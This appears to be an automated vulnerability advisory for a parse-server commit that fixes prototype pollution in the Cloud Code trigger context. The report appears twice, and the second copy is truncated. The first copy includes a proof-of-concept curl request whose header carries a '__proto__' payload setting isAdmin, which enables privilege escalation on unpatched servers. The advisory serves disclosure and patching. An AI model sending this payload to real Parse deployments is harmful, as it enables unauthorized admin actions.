Potential Security Vulnerability Detected
Repository: parse-community/parse-server
Commit: d5f5128
Author: Manuel
Date: 2026-03-29T23:21:18Z
Commit Message
fix: Cloud Code trigger context vulnerable to prototype pollution (#10352)
Pull Request
PR: #10352 - fix: Cloud Code trigger context vulnerable to prototype pollution
Labels: state:released-alpha
Description:
Issue
Cloud Code trigger context vulnerable to prototype pollution
Tasks
Analysis
Vulnerability Type: Prototype Pollution
Severity: High
Description
The patch fixes a prototype pollution vulnerability in the Cloud Code trigger context where user-controllable input via the X-Parse-Cloud-Context header or _context body field could inject properties into Object.prototype. This could lead to privilege escalation or unexpected behavior in Cloud Code by altering the prototype chain of the request context. The fix isolates the context object by creating it with a null prototype, preventing pollution.
Affected Code
// Set a copy of the context on the request object.
request.context = Object.assign({}, context);
Proof of Concept
Send a request with header 'X-Parse-Cloud-Context' set to '{"__proto__": {"isAdmin": true}}' and a beforeSave Cloud Code trigger accessing request.context.isAdmin. Before the patch, isAdmin would be true (prototype polluted), potentially allowing unauthorized admin actions. Example request:
curl -X POST http://localhost:8378/1/classes/ContextTest \
-H 'X-Parse-Application-Id: test' \
-H 'X-Parse-REST-API-Key: rest' \
-H 'X-Parse-Cloud-Context: {"__proto__": {"isAdmin": true}}' \
-H 'Content-Type: application/json' \
-d '{"foo":"bar"}'
Before patch, in Cloud Code:
Parse.Cloud.beforeSave('ContextTest', req => {
if(req.context.isAdmin) {
// unauthorized escalation
}
});
isAdmin would be true due to prototype pollution, after patch it is undefined.
This issue was automatically created by Vulnerability Spoiler Alert.
Detected at: 2026-03-30T00:00:35.188Z
Potential Security Vulnerability Detected
Repository: parse-community/parse-server
Commit: d5f5128
Author: Manuel
Date: 2026-03-29T23:21:18Z
Commit Message
Pull Request
PR: #10352 - fix: Cloud Code trigger context vulnerable to prototype pollution
Labels: state:released-alpha
Description:
Issue
Cloud Code trigger context vulnerable to prototype pollution
Tasks
Analysis
Vulnerability Type: Prototype Pollution
Severity: High
Description
The patch fixes a prototype pollution vulnerability in the Cloud Code trigger context where user-controllable input via the X-Parse-Cloud-Context header or _context body field could inject properties into Object.prototype. This could lead to privilege escalation or unexpected behavior in Cloud Code by altering the prototype chain of the request context. The fix isolates the context object by creating it with a null prototype, preventing pollution.
Affected Code
Proof of Concept
This issue was automatically created by Vulnerability Spoiler Alert.
Detected at: 2026-03-30T00:00:35.188Z